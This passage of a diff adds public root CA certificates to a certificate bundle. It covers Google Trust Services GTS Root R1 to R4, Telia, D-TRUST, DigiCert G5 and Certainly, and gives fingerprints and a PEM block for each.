e5:8c:1c:c4:91:3b:38:63:4b:e9:10:6e:e3:ad:8e:6b:9d:d9:81:4a +# SHA256 Fingerprint: d9:47:43:2a:bd:e7:b7:fa:90:fc:2e:6b:59:10:1b:12:80:e0:e1:c7:e4:e4:0f:a3:c6:88:7f:ff:57:a7:f4:cf +-----BEGIN CERTIFICATE----- +MIIFVzCCAz+gAwIBAgINAgPlk28xsBNJiGuiFzANBgkqhkiG9w0BAQwFADBHMQsw +CQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEU +MBIGA1UEAxMLR1RTIFJvb3QgUjEwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAw +MDAwWjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZp +Y2VzIExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjEwggIiMA0GCSqGSIb3DQEBAQUA +A4ICDwAwggIKAoICAQC2EQKLHuOhd5s73L+UPreVp0A8of2C+X0yBoJx9vaMf/vo +27xqLpeXo4xL+Sv2sfnOhB2x+cWX3u+58qPpvBKJXqeqUqv4IyfLpLGcY9vXmX7w +Cl7raKb0xlpHDU0QM+NOsROjyBhsS+z8CZDfnWQpJSMHobTSPS5g4M/SCYe7zUjw +TcLCeoiKu7rPWRnWr4+wB7CeMfGCwcDfLqZtbBkOtdh+JhpFAz2weaSUKK0Pfybl +qAj+lug8aJRT7oM6iCsVlgmy4HqMLnXWnOunVmSPlk9orj2XwoSPwLxAwAtcvfaH +szVsrBhQf4TgTM2S0yDpM7xSma8ytSmzJSq0SPly4cpk9+aCEI3oncKKiPo4Zor8 +Y/kB+Xj9e1x3+naH+uzfsQ55lVe0vSbv1gHR6xYKu44LtcXFilWr06zqkUspzBmk +MiVOKvFlRNACzqrOSbTqn3yDsEB750Orp2yjj32JgfpMpf/VjsPOS+C12LOORc92 +wO1AK/1TD7Cn1TsNsYqiA94xrcx36m97PtbfkSIS5r762DL8EGMUUXLeXdYWk70p +aDPvOmbsB4om3xPXV2V4J95eSRQAogB/mqghtqmxlbCluQ0WEdrHbEg8QOB+DVrN +VjzRlwW5y0vtOUucxD/SVRNuJLDWcfr0wbrM7Rv1/oFB2ACYPTrIrnqYNxgFlQID +AQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4E +FgQU5K8rJnEaK0gnhS9SZizv8IkTcT4wDQYJKoZIhvcNAQEMBQADggIBAJ+qQibb +C5u+/x6Wki4+omVKapi6Ist9wTrYggoGxval3sBOh2Z5ofmmWJyq+bXmYOfg6LEe +QkEzCzc9zolwFcq1JKjPa7XSQCGYzyI0zzvFIoTgxQ6KfF2I5DUkzps+GlQebtuy +h6f88/qBVRRiClmpIgUxPoLW7ttXNLwzldMXG+gnoot7TiYaelpkttGsN/H9oPM4 +7HLwEXWdyzRSjeZ2axfG34arJ45JK3VmgRAhpuo+9K4l/3wV3s6MJT/KYnAK9y8J +ZgfIPxz88NtFMN9iiMG1D53Dn0reWVlHxYciNuaCp+0KueIHoI17eko8cdLiA6Ef +MgfdG+RCzgwARWGAtQsgWSl4vflVy2PFPEz0tv/bal8xa5meLMFrUKTX5hgUvYU/ 
+Z6tGn6D/Qqc6f1zLXbBwHSs09dR2CQzreExZBfMzQsNhFRAbd03OIozUhfJFfbdT +6u9AWpQKXCBfTkBdYiJ23//OYb2MI3jSNwLgjt7RETeJ9r/tSQdirpLsQBqvFAnZ +0E6yove+7u7Y/9waLd64NnHi/Hm3lCXRSHNboTXns5lndcEZOitHTtNCjv0xyBZm +2tIMPNuzjsmhDYAPexZ3FL//2wmUspO8IFgV6dtxQ/PeEMMA3KgqlbbC1j+Qa3bb +bP6MvPJwNQzcmRk13NfIRmPVNnGuV/u3gm3c +-----END CERTIFICATE----- + +# Issuer: CN=GTS Root R2 O=Google Trust Services LLC +# Subject: CN=GTS Root R2 O=Google Trust Services LLC +# Label: "GTS Root R2" +# Serial: 159662449406622349769042896298 +# MD5 Fingerprint: 1e:39:c0:53:e6:1e:29:82:0b:ca:52:55:36:5d:57:dc +# SHA1 Fingerprint: 9a:44:49:76:32:db:de:fa:d0:bc:fb:5a:7b:17:bd:9e:56:09:24:94 +# SHA256 Fingerprint: 8d:25:cd:97:22:9d:bf:70:35:6b:da:4e:b3:cc:73:40:31:e2:4c:f0:0f:af:cf:d3:2d:c7:6e:b5:84:1c:7e:a8 +-----BEGIN CERTIFICATE----- +MIIFVzCCAz+gAwIBAgINAgPlrsWNBCUaqxElqjANBgkqhkiG9w0BAQwFADBHMQsw +CQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEU +MBIGA1UEAxMLR1RTIFJvb3QgUjIwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAw +MDAwWjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZp +Y2VzIExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjIwggIiMA0GCSqGSIb3DQEBAQUA +A4ICDwAwggIKAoICAQDO3v2m++zsFDQ8BwZabFn3GTXd98GdVarTzTukk3LvCvpt +nfbwhYBboUhSnznFt+4orO/LdmgUud+tAWyZH8QiHZ/+cnfgLFuv5AS/T3KgGjSY +6Dlo7JUle3ah5mm5hRm9iYz+re026nO8/4Piy33B0s5Ks40FnotJk9/BW9BuXvAu +MC6C/Pq8tBcKSOWIm8Wba96wyrQD8Nr0kLhlZPdcTK3ofmZemde4wj7I0BOdre7k +RXuJVfeKH2JShBKzwkCX44ofR5GmdFrS+LFjKBC4swm4VndAoiaYecb+3yXuPuWg +f9RhD1FLPD+M2uFwdNjCaKH5wQzpoeJ/u1U8dgbuak7MkogwTZq9TwtImoS1mKPV ++3PBV2HdKFZ1E66HjucMUQkQdYhMvI35ezzUIkgfKtzra7tEscszcTJGr61K8Yzo +dDqs5xoic4DSMPclQsciOzsSrZYuxsN2B6ogtzVJV+mSSeh2FnIxZyuWfoqjx5RW +Ir9qS34BIbIjMt/kmkRtWVtd9QCgHJvGeJeNkP+byKq0rxFROV7Z+2et1VsRnTKa +G73VululycslaVNVJ1zgyjbLiGH7HrfQy+4W+9OmTN6SpdTi3/UGVN4unUu0kzCq +gc7dGtxRcw1PcOnlthYhGXmy5okLdWTK1au8CcEYof/UVKGFPP0UJAOyh9OktwID +AQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4E +FgQUu//KjiOfT5nK2+JopqUVJxce2Q4wDQYJKoZIhvcNAQEMBQADggIBAB/Kzt3H +vqGf2SdMC9wXmBFqiN495nFWcrKeGk6c1SuYJF2ba3uwM4IJvd8lRuqYnrYb/oM8 +0mJhwQTtzuDFycgTE1XnqGOtjHsB/ncw4c5omwX4Eu55MaBBRTUoCnGkJE+M3DyC +B19m3H0Q/gxhswWV7uGugQ+o+MePTagjAiZrHYNSVc61LwDKgEDg4XSsYPWHgJ2u +NmSRXbBoGOqKYcl3qJfEycel/FVL8/B/uWU9J2jQzGv6U53hkRrJXRqWbTKH7QMg +yALOWr7Z6v2yTcQvG99fevX4i8buMTolUVVnjWQye+mew4K6Ki3pHrTgSAai/Gev +HyICc/sgCq+dVEuhzf9gR7A/Xe8bVr2XIZYtCtFenTgCR2y59PYjJbigapordwj6 +xLEokCZYCDzifqrXPW+6MYgKBesntaFJ7qBFVHvmJ2WZICGoo7z7GJa7Um8M7YNR +TOlZ4iBgxcJlkoKM8xAfDoqXvneCbT+PHV28SSe9zE8P4c52hgQjxcCMElv924Sg +JPFI/2R80L5cFtHvma3AH/vLrrw4IgYmZNralw4/KBVEqE8AyvCazM90arQ+POuV +7LXTWtiBmelDGDfrs7vRWGJB82bSj6p4lVQgw1oudCvV0b4YacCs1aTPObpRhANl +6WLAYv7YTVWW4tAR+kg0Eeye7QUd5MjWHYbL +-----END CERTIFICATE----- + +# Issuer: CN=GTS Root R3 O=Google Trust Services LLC +# Subject: CN=GTS Root R3 O=Google Trust Services LLC +# Label: "GTS Root R3" +# Serial: 159662495401136852707857743206 +# MD5 Fingerprint: 3e:e7:9d:58:02:94:46:51:94:e5:e0:22:4a:8b:e7:73 +# SHA1 Fingerprint: ed:e5:71:80:2b:c8:92:b9:5b:83:3c:d2:32:68:3f:09:cd:a0:1e:46 +# SHA256 Fingerprint: 34:d8:a7:3e:e2:08:d9:bc:db:0d:95:65:20:93:4b:4e:40:e6:94:82:59:6e:8b:6f:73:c8:42:6b:01:0a:6f:48 +-----BEGIN CERTIFICATE----- +MIICCTCCAY6gAwIBAgINAgPluILrIPglJ209ZjAKBggqhkjOPQQDAzBHMQswCQYD +VQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEUMBIG +A1UEAxMLR1RTIFJvb3QgUjMwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAwMDAw +WjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2Vz +IExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjMwdjAQBgcqhkjOPQIBBgUrgQQAIgNi 
+AAQfTzOHMymKoYTey8chWEGJ6ladK0uFxh1MJ7x/JlFyb+Kf1qPKzEUURout736G +jOyxfi//qXGdGIRFBEFVbivqJn+7kAHjSxm65FSWRQmx1WyRRK2EE46ajA2ADDL2 +4CejQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBTB8Sa6oC2uhYHP0/EqEr24Cmf9vDAKBggqhkjOPQQDAwNpADBmAjEA9uEglRR7 +VKOQFhG/hMjqb2sXnh5GmCCbn9MN2azTL818+FsuVbu/3ZL3pAzcMeGiAjEA/Jdm +ZuVDFhOD3cffL74UOO0BzrEXGhF16b0DjyZ+hOXJYKaV11RZt+cRLInUue4X +-----END CERTIFICATE----- + +# Issuer: CN=GTS Root R4 O=Google Trust Services LLC +# Subject: CN=GTS Root R4 O=Google Trust Services LLC +# Label: "GTS Root R4" +# Serial: 159662532700760215368942768210 +# MD5 Fingerprint: 43:96:83:77:19:4d:76:b3:9d:65:52:e4:1d:22:a5:e8 +# SHA1 Fingerprint: 77:d3:03:67:b5:e0:0c:15:f6:0c:38:61:df:7c:e1:3b:92:46:4d:47 +# SHA256 Fingerprint: 34:9d:fa:40:58:c5:e2:63:12:3b:39:8a:e7:95:57:3c:4e:13:13:c8:3f:e6:8f:93:55:6c:d5:e8:03:1b:3c:7d +-----BEGIN CERTIFICATE----- +MIICCTCCAY6gAwIBAgINAgPlwGjvYxqccpBQUjAKBggqhkjOPQQDAzBHMQswCQYD +VQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzEUMBIG +A1UEAxMLR1RTIFJvb3QgUjQwHhcNMTYwNjIyMDAwMDAwWhcNMzYwNjIyMDAwMDAw +WjBHMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2Vz +IExMQzEUMBIGA1UEAxMLR1RTIFJvb3QgUjQwdjAQBgcqhkjOPQIBBgUrgQQAIgNi +AATzdHOnaItgrkO4NcWBMHtLSZ37wWHO5t5GvWvVYRg1rkDdc/eJkTBa6zzuhXyi +QHY7qca4R9gq55KRanPpsXI5nymfopjTX15YhmUPoYRlBtHci8nHc8iMai/lxKvR +HYqjQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW +BBSATNbrdP9JNqPV2Py1PsVq8JQdjDAKBggqhkjOPQQDAwNpADBmAjEA6ED/g94D +9J+uHXqnLrmvT/aDHQ4thQEd0dlq7A/Cr8deVl5c1RxYIigL9zC2L7F8AjEA8GE8 +p/SgguMh1YQdc4acLa/KNJvxn7kjNuK8YAOdgLOaVsjh4rsUecrNIdSUtUlD +-----END CERTIFICATE----- + +# Issuer: CN=Telia Root CA v2 O=Telia Finland Oyj +# Subject: CN=Telia Root CA v2 O=Telia Finland Oyj +# Label: "Telia Root CA v2" +# Serial: 7288924052977061235122729490515358 +# MD5 Fingerprint: 0e:8f:ac:aa:82:df:85:b1:f4:dc:10:1c:fc:99:d9:48 +# SHA1 Fingerprint: b9:99:cd:d1:73:50:8a:c4:47:05:08:9c:8c:88:fb:be:a0:2b:40:cd +# SHA256 Fingerprint: 24:2b:69:74:2f:cb:1e:5b:2a:bf:98:89:8b:94:57:21:87:54:4e:5b:4d:99:11:78:65:73:62:1f:6a:74:b8:2c +-----BEGIN CERTIFICATE----- +MIIFdDCCA1ygAwIBAgIPAWdfJ9b+euPkrL4JWwWeMA0GCSqGSIb3DQEBCwUAMEQx +CzAJBgNVBAYTAkZJMRowGAYDVQQKDBFUZWxpYSBGaW5sYW5kIE95ajEZMBcGA1UE +AwwQVGVsaWEgUm9vdCBDQSB2MjAeFw0xODExMjkxMTU1NTRaFw00MzExMjkxMTU1 +NTRaMEQxCzAJBgNVBAYTAkZJMRowGAYDVQQKDBFUZWxpYSBGaW5sYW5kIE95ajEZ +MBcGA1UEAwwQVGVsaWEgUm9vdCBDQSB2MjCCAiIwDQYJKoZIhvcNAQEBBQADggIP +ADCCAgoCggIBALLQPwe84nvQa5n44ndp586dpAO8gm2h/oFlH0wnrI4AuhZ76zBq +AMCzdGh+sq/H1WKzej9Qyow2RCRj0jbpDIX2Q3bVTKFgcmfiKDOlyzG4OiIjNLh9 +vVYiQJ3q9HsDrWj8soFPmNB06o3lfc1jw6P23pLCWBnglrvFxKk9pXSW/q/5iaq9 +lRdU2HhE8Qx3FZLgmEKnpNaqIJLNwaCzlrI6hEKNfdWV5Nbb6WLEWLN5xYzTNTOD +n3WhUidhOPFZPY5Q4L15POdslv5e2QJltI5c0BE0312/UqeBAMN/mUWZFdUXyApT +7GPzmX3MaRKGwhfwAZ6/hLzRUssbkmbOpFPlob/E2wnW5olWK8jjfN7j/4nlNW4o +6GwLI1GpJQXrSPjdscr6bAhR77cYbETKJuFzxokGgeWKrLDiKca5JLNrRBH0pUPC +TEPlcDaMtjNXepUugqD0XBCzYYP2AgWGLnwtbNwDRm41k9V6lS/eINhbfpSQBGq6 +WT0EBXWdN6IOLj3rwaRSg/7Qa9RmjtzG6RJOHSpXqhC8fF6CfaamyfItufUXJ63R +DolUK5X6wK0dmBR4M0KGCqlztft0DbcbMBnEWg4cJ7faGND/isgFuvGqHKI3t+ZI +pEYslOqodmJHixBTB0hXbOKSTbauBcvcwUpej6w9GU7C7WB1K9vBykLVAgMBAAGj +YzBhMB8GA1UdIwQYMBaAFHKs5DN5qkWH9v2sHZ7Wxy+G2CQ5MB0GA1UdDgQWBBRy +rOQzeapFh/b9rB2e1scvhtgkOTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUw +AwEB/zANBgkqhkiG9w0BAQsFAAOCAgEAoDtZpwmUPjaE0n4vOaWWl/oRrfxn83EJ +8rKJhGdEr7nv7ZbsnGTbMjBvZ5qsfl+yqwE2foH65IRe0qw24GtixX1LDoJt0nZi +0f6X+J8wfBj5tFJ3gh1229MdqfDBmgC9bXXYfef6xzijnHDoRnkDry5023X4blMM 
+A8iZGok1GTzTyVR8qPAs5m4HeW9q4ebqkYJpCh3DflminmtGFZhb069GHWLIzoBS +SRE/yQQSwxN8PzuKlts8oB4KtItUsiRnDe+Cy748fdHif64W1lZYudogsYMVoe+K +TTJvQS8TUoKU1xrBeKJR3Stwbbca+few4GeXVtt8YVMJAygCQMez2P2ccGrGKMOF +6eLtGpOg3kuYooQ+BXcBlj37tCAPnHICehIv1aO6UXivKitEZU61/Qrowc15h2Er +3oBXRb9n8ZuRXqWk7FlIEA04x7D6w0RtBPV4UBySllva9bguulvP5fBqnUsvWHMt +Ty3EHD70sz+rFQ47GUGKpMFXEmZxTPpT41frYpUJnlTd0cI8Vzy9OK2YZLe4A5pT +VmBds9hCG1xLEooc6+t9xnppxyd/pPiL8uSUZodL6ZQHCRJ5irLrdATczvREWeAW +ysUsWNc8e89ihmpQfTU2Zqf7N+cox9jQraVplI/owd8k+BsHMYeB2F326CjYSlKA +rBPuUBQemMc= +-----END CERTIFICATE----- + +# Issuer: CN=D-TRUST BR Root CA 1 2020 O=D-Trust GmbH +# Subject: CN=D-TRUST BR Root CA 1 2020 O=D-Trust GmbH +# Label: "D-TRUST BR Root CA 1 2020" +# Serial: 165870826978392376648679885835942448534 +# MD5 Fingerprint: b5:aa:4b:d5:ed:f7:e3:55:2e:8f:72:0a:f3:75:b8:ed +# SHA1 Fingerprint: 1f:5b:98:f0:e3:b5:f7:74:3c:ed:e6:b0:36:7d:32:cd:f4:09:41:67 +# SHA256 Fingerprint: e5:9a:aa:81:60:09:c2:2b:ff:5b:25:ba:d3:7d:f3:06:f0:49:79:7c:1f:81:d8:5a:b0:89:e6:57:bd:8f:00:44 +-----BEGIN CERTIFICATE----- +MIIC2zCCAmCgAwIBAgIQfMmPK4TX3+oPyWWa00tNljAKBggqhkjOPQQDAzBIMQsw +CQYDVQQGEwJERTEVMBMGA1UEChMMRC1UcnVzdCBHbWJIMSIwIAYDVQQDExlELVRS +VVNUIEJSIFJvb3QgQ0EgMSAyMDIwMB4XDTIwMDIxMTA5NDUwMFoXDTM1MDIxMTA5 +NDQ1OVowSDELMAkGA1UEBhMCREUxFTATBgNVBAoTDEQtVHJ1c3QgR21iSDEiMCAG +A1UEAxMZRC1UUlVTVCBCUiBSb290IENBIDEgMjAyMDB2MBAGByqGSM49AgEGBSuB +BAAiA2IABMbLxyjR+4T1mu9CFCDhQ2tuda38KwOE1HaTJddZO0Flax7mNCq7dPYS +zuht56vkPE4/RAiLzRZxy7+SmfSk1zxQVFKQhYN4lGdnoxwJGT11NIXe7WB9xwy0 +QVK5buXuQqOCAQ0wggEJMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFHOREKv/ +VbNafAkl1bK6CKBrqx9tMA4GA1UdDwEB/wQEAwIBBjCBxgYDVR0fBIG+MIG7MD6g +PKA6hjhodHRwOi8vY3JsLmQtdHJ1c3QubmV0L2NybC9kLXRydXN0X2JyX3Jvb3Rf +Y2FfMV8yMDIwLmNybDB5oHegdYZzbGRhcDovL2RpcmVjdG9yeS5kLXRydXN0Lm5l +dC9DTj1ELVRSVVNUJTIwQlIlMjBSb290JTIwQ0ElMjAxJTIwMjAyMCxPPUQtVHJ1 +c3QlMjBHbWJILEM9REU/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlzdDAKBggqhkjO +PQQDAwNpADBmAjEAlJAtE/rhY/hhY+ithXhUkZy4kzg+GkHaQBZTQgjKL47xPoFW +wKrY7RjEsK70PvomAjEA8yjixtsrmfu3Ubgko6SUeho/5jbiA1czijDLgsfWFBHV +dWNbFJWcHwHP2NVypw87 +-----END CERTIFICATE----- + +# Issuer: CN=D-TRUST EV Root CA 1 2020 O=D-Trust GmbH +# Subject: CN=D-TRUST EV Root CA 1 2020 O=D-Trust GmbH +# Label: "D-TRUST EV Root CA 1 2020" +# Serial: 126288379621884218666039612629459926992 +# MD5 Fingerprint: 8c:2d:9d:70:9f:48:99:11:06:11:fb:e9:cb:30:c0:6e +# SHA1 Fingerprint: 61:db:8c:21:59:69:03:90:d8:7c:9c:12:86:54:cf:9d:3d:f4:dd:07 +# SHA256 Fingerprint: 08:17:0d:1a:a3:64:53:90:1a:2f:95:92:45:e3:47:db:0c:8d:37:ab:aa:bc:56:b8:1a:a1:00:dc:95:89:70:db +-----BEGIN CERTIFICATE----- +MIIC2zCCAmCgAwIBAgIQXwJB13qHfEwDo6yWjfv/0DAKBggqhkjOPQQDAzBIMQsw +CQYDVQQGEwJERTEVMBMGA1UEChMMRC1UcnVzdCBHbWJIMSIwIAYDVQQDExlELVRS +VVNUIEVWIFJvb3QgQ0EgMSAyMDIwMB4XDTIwMDIxMTEwMDAwMFoXDTM1MDIxMTA5 +NTk1OVowSDELMAkGA1UEBhMCREUxFTATBgNVBAoTDEQtVHJ1c3QgR21iSDEiMCAG +A1UEAxMZRC1UUlVTVCBFViBSb290IENBIDEgMjAyMDB2MBAGByqGSM49AgEGBSuB +BAAiA2IABPEL3YZDIBnfl4XoIkqbz52Yv7QFJsnL46bSj8WeeHsxiamJrSc8ZRCC +/N/DnU7wMyPE0jL1HLDfMxddxfCxivnvubcUyilKwg+pf3VlSSowZ/Rk99Yad9rD +wpdhQntJraOCAQ0wggEJMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFH8QARY3 +OqQo5FD4pPfsazK2/umLMA4GA1UdDwEB/wQEAwIBBjCBxgYDVR0fBIG+MIG7MD6g +PKA6hjhodHRwOi8vY3JsLmQtdHJ1c3QubmV0L2NybC9kLXRydXN0X2V2X3Jvb3Rf +Y2FfMV8yMDIwLmNybDB5oHegdYZzbGRhcDovL2RpcmVjdG9yeS5kLXRydXN0Lm5l +dC9DTj1ELVRSVVNUJTIwRVYlMjBSb290JTIwQ0ElMjAxJTIwMjAyMCxPPUQtVHJ1 +c3QlMjBHbWJILEM9REU/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlzdDAKBggqhkjO +PQQDAwNpADBmAjEAyjzGKnXCXnViOTYAYFqLwZOZzNnbQTs7h5kXO9XMT8oi96CA 
+y/m0sRtW9XLS/BnRAjEAkfcwkz8QRitxpNA7RJvAKQIFskF3UfN5Wp6OFKBOQtJb +gfM0agPnIjhQW+0ZT0MW +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert TLS ECC P384 Root G5 O=DigiCert, Inc. +# Subject: CN=DigiCert TLS ECC P384 Root G5 O=DigiCert, Inc. +# Label: "DigiCert TLS ECC P384 Root G5" +# Serial: 13129116028163249804115411775095713523 +# MD5 Fingerprint: d3:71:04:6a:43:1c:db:a6:59:e1:a8:a3:aa:c5:71:ed +# SHA1 Fingerprint: 17:f3:de:5e:9f:0f:19:e9:8e:f6:1f:32:26:6e:20:c4:07:ae:30:ee +# SHA256 Fingerprint: 01:8e:13:f0:77:25:32:cf:80:9b:d1:b1:72:81:86:72:83:fc:48:c6:e1:3b:e9:c6:98:12:85:4a:49:0c:1b:05 +-----BEGIN CERTIFICATE----- +MIICGTCCAZ+gAwIBAgIQCeCTZaz32ci5PhwLBCou8zAKBggqhkjOPQQDAzBOMQsw +CQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xJjAkBgNVBAMTHURp +Z2lDZXJ0IFRMUyBFQ0MgUDM4NCBSb290IEc1MB4XDTIxMDExNTAwMDAwMFoXDTQ2 +MDExNDIzNTk1OVowTjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJ +bmMuMSYwJAYDVQQDEx1EaWdpQ2VydCBUTFMgRUNDIFAzODQgUm9vdCBHNTB2MBAG +ByqGSM49AgEGBSuBBAAiA2IABMFEoc8Rl1Ca3iOCNQfN0MsYndLxf3c1TzvdlHJS +7cI7+Oz6e2tYIOyZrsn8aLN1udsJ7MgT9U7GCh1mMEy7H0cKPGEQQil8pQgO4CLp +0zVozptjn4S1mU1YoI71VOeVyaNCMEAwHQYDVR0OBBYEFMFRRVBZqz7nLFr6ICIS +B4CIfBFqMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MAoGCCqGSM49 +BAMDA2gAMGUCMQCJao1H5+z8blUD2WdsJk6Dxv3J+ysTvLd6jLRl0mlpYxNjOyZQ +LgGheQaRnUi/wr4CMEfDFXuxoJGZSZOoPHzoRgaLLPIxAJSdYsiJvRmEFOml+wG4 +DXZDjC5Ty3zfDBeWUA== +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert TLS RSA4096 Root G5 O=DigiCert, Inc. +# Subject: CN=DigiCert TLS RSA4096 Root G5 O=DigiCert, Inc. +# Label: "DigiCert TLS RSA4096 Root G5" +# Serial: 11930366277458970227240571539258396554 +# MD5 Fingerprint: ac:fe:f7:34:96:a9:f2:b3:b4:12:4b:e4:27:41:6f:e1 +# SHA1 Fingerprint: a7:88:49:dc:5d:7c:75:8c:8c:de:39:98:56:b3:aa:d0:b2:a5:71:35 +# SHA256 Fingerprint: 37:1a:00:dc:05:33:b3:72:1a:7e:eb:40:e8:41:9e:70:79:9d:2b:0a:0f:2c:1d:80:69:31:65:f7:ce:c4:ad:75 +-----BEGIN CERTIFICATE----- +MIIFZjCCA06gAwIBAgIQCPm0eKj6ftpqMzeJ3nzPijANBgkqhkiG9w0BAQwFADBN +MQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xJTAjBgNVBAMT +HERpZ2lDZXJ0IFRMUyBSU0E0MDk2IFJvb3QgRzUwHhcNMjEwMTE1MDAwMDAwWhcN +NDYwMTE0MjM1OTU5WjBNMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQs +IEluYy4xJTAjBgNVBAMTHERpZ2lDZXJ0IFRMUyBSU0E0MDk2IFJvb3QgRzUwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCz0PTJeRGd/fxmgefM1eS87IE+ +ajWOLrfn3q/5B03PMJ3qCQuZvWxX2hhKuHisOjmopkisLnLlvevxGs3npAOpPxG0 +2C+JFvuUAT27L/gTBaF4HI4o4EXgg/RZG5Wzrn4DReW+wkL+7vI8toUTmDKdFqgp +wgscONyfMXdcvyej/Cestyu9dJsXLfKB2l2w4SMXPohKEiPQ6s+d3gMXsUJKoBZM +pG2T6T867jp8nVid9E6P/DsjyG244gXazOvswzH016cpVIDPRFtMbzCe88zdH5RD +nU1/cHAN1DrRN/BsnZvAFJNY781BOHW8EwOVfH/jXOnVDdXifBBiqmvwPXbzP6Po +sMH976pXTayGpxi0KcEsDr9kvimM2AItzVwv8n/vFfQMFawKsPHTDU9qTXeXAaDx +Zre3zu/O7Oyldcqs4+Fj97ihBMi8ez9dLRYiVu1ISf6nL3kwJZu6ay0/nTvEF+cd +Lvvyz6b84xQslpghjLSR6Rlgg/IwKwZzUNWYOwbpx4oMYIwo+FKbbuH2TbsGJJvX +KyY//SovcfXWJL5/MZ4PbeiPT02jP/816t9JXkGPhvnxd3lLG7SjXi/7RgLQZhNe +XoVPzthwiHvOAbWWl9fNff2C+MIkwcoBOU+NosEUQB+cZtUMCUbW8tDRSHZWOkPL +tgoRObqME2wGtZ7P6wIDAQABo0IwQDAdBgNVHQ4EFgQUUTMc7TZArxfTJc1paPKv +TiM+s0EwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcN +AQEMBQADggIBAGCmr1tfV9qJ20tQqcQjNSH/0GEwhJG3PxDPJY7Jv0Y02cEhJhxw +GXIeo8mH/qlDZJY6yFMECrZBu8RHANmfGBg7sg7zNOok992vIGCukihfNudd5N7H +PNtQOa27PShNlnx2xlv0wdsUpasZYgcYQF+Xkdycx6u1UQ3maVNVzDl92sURVXLF +O4uJ+DQtpBflF+aZfTCIITfNMBc9uPK8qHWgQ9w+iUuQrm0D4ByjoJYJu32jtyoQ +REtGBzRj7TG5BO6jm5qu5jF49OokYTurWGT/u4cnYiWB39yhL/btp/96j1EuMPik +AdKFOV8BmZZvWltwGUb+hmA+rYAQCd05JS9Yf7vSdPD3Rh9GOUrYU9DzLjtxpdRv 
+/PNn5AeP3SYZ4Y1b+qOTEZvpyDrDVWiakuFSdjjo4bq9+0/V77PnSIMx8IIh47a+ +p6tv75/fTM8BuGJqIz3nCU2AG3swpMPdB380vqQmsvZB6Akd4yCYqjdP//fx4ilw +MUc/dNAUFvohigLVigmUdy7yWSiLfFCSCmZ4OIN1xLVaqBHG5cGdZlXPU8Sv13WF +qUITVuwhd4GTWgzqltlJyqEI8pc7bZsEGCREjnwB8twl2F6GmrE52/WRMmrRpnCK +ovfepEWFJqgejF0pW8hL2JpqA15w8oVPbEtoL8pU9ozaMv7Da4M/OMZ+ +-----END CERTIFICATE----- + +# Issuer: CN=Certainly Root R1 O=Certainly +# Subject: CN=Certainly Root R1 O=Certainly +# Label: "Certainly Root R1" +# Serial: 188833316161142517227353805653483829216 +# MD5 Fingerprint: 07:70:d4:3e:82:87:a0:fa:33:36:13:f4:fa:33:e7:12 +# SHA1 Fingerprint: a0:50:ee:0f:28:71:f4:27:b2:12:6d:6f:50:96:25:ba:cc:86:42:af +# SHA256 Fingerprint: 77:b8:2c:d8:64:4c:43:05:f7:ac:c5:cb:15:6b:45:67:50:04:03:3d:51:c6:0c:62:02:a8:e0:c3:34:67:d3:a0 +-----BEGIN CERTIFICATE----- +MIIFRzCCAy+gAwIBAgIRAI4P+UuQcWhlM1T01EQ5t+AwDQYJKoZIhvcNAQELBQAw +PTELMAkGA1UEBhMCVVMxEjAQBgNVBAoTCUNlcnRhaW5seTEaMBgGA1UEAxMRQ2Vy +dGFpbmx5IFJvb3QgUjEwHhcNMjEwNDAxMDAwMDAwWhcNNDYwNDAxMDAwMDAwWjA9 +MQswCQYDVQQGEwJVUzESMBAGA1UEChMJQ2VydGFpbmx5MRowGAYDVQQDExFDZXJ0 +YWlubHkgUm9vdCBSMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBANA2 +1B/q3avk0bbm+yLA3RMNansiExyXPGhjZjKcA7WNpIGD2ngwEc/csiu+kr+O5MQT +vqRoTNoCaBZ0vrLdBORrKt03H2As2/X3oXyVtwxwhi7xOu9S98zTm/mLvg7fMbed 